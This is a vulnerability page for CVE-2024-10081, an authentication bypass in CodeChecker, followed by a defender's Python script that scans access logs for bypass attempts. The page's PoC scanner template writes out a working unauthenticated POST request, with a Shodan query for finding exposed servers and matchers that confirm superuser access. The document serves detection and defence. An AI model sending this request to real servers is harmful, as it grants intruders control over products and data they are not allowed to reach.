Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
PoC code [public]
id: CVE-2024-10081
info:
  name: CodeChecker <= 6.24.1 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
  reference:
    - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
    - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10081
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10
    cve-id: CVE-2024-10081
    cwe-id: CWE-288
    epss-score: 0.5706
    epss-percentile: 0.98067
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1496590341
  tags: cve,cve2024,code-checker,auth-bypass,vkev
http:
  - raw:
      - |
        POST /v6.58/Products/Authentication HTTP/1.1
        Host: {{Hostname}}

        [1,"getProducts",1,1,{}]
    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
          - "!contains(body,'Error code 401: Unauthorized')"
          - "contains(header,'application/x-thrift')"
        condition: and
# digest: 4a0a00473045022100f64d19129d85e9c2c1f55e35bb3e2c9e90f2d016f885ce66b38a02fa93594e6602207eea22bcdbc0f33f18cef6f3eeff17090b6edce3b5301b792af018d64ce3f905:922c64590222798bb761d5b6d8e72950
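For defenders reviewing web or reverse-proxy logs in front of a CodeChecker server, the following added example (not part of the original page and not CodeChecker code) flags POST requests whose path ends with one of the three names from the description but has another endpoint segment in front of it, as in the template's `/v6.58/Products/Authentication`. The log format, the function names, and the rule that a legitimate request has the version segment directly before the endpoint name are assumptions.

```python
import re
from urllib.parse import unquote

# Endpoint names that trigger the bypass when a URL ends with them (from the description).
BYPASS_SUFFIXES = {"Authentication", "Configuration", "ServerInfo"}
# Assumption: a legitimate call has the API version segment (e.g. v6.58) directly before the name.
VERSION_SEGMENT = re.compile(r"^v\d+\.\d+$")
# Assumption: combined-style access log containing '"METHOD path HTTP/x.y" status'.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def is_suspicious_path(path):
    """True when a bypass suffix is appended after some other endpoint segment."""
    segments = [s for s in unquote(path.split("?", 1)[0]).split("/") if s]
    if len(segments) < 2 or segments[-1] not in BYPASS_SUFFIXES:
        return False
    return VERSION_SEGMENT.match(segments[-2]) is None


def find_bypass_attempts(log_lines):
    """Return (path, status) for each POST whose path matches the bypass shape."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and m["method"] == "POST" and is_suspicious_path(m["path"]):
            hits.append((m["path"], int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "POST /v6.58/Authentication HTTP/1.1" 200 120',
    '192.0.2.10 - - [01/Jan/2025:10:00:02 +0000] "POST /v6.58/Products HTTP/1.1" 401 45',
    '198.51.100.7 - - [01/Jan/2025:10:05:11 +0000] "POST /v6.58/Products/Authentication HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2025:10:05:12 +0000] "POST /v6.58/Products/ServerInfo HTTP/1.1" 401 45',
    '192.0.2.10 - - [01/Jan/2025:10:06:00 +0000] "GET /v6.58/Products/Authentication HTTP/1.1" 405 0',
]

if __name__ == "__main__":
    for path, status in find_bypass_attempts(SAMPLE_LOG):
        print(f"{status} {path}")
```

A hit answered with a 2xx status deserves priority, since the template's own matcher treats the absence of `Error code 401: Unauthorized` in the body as confirmation.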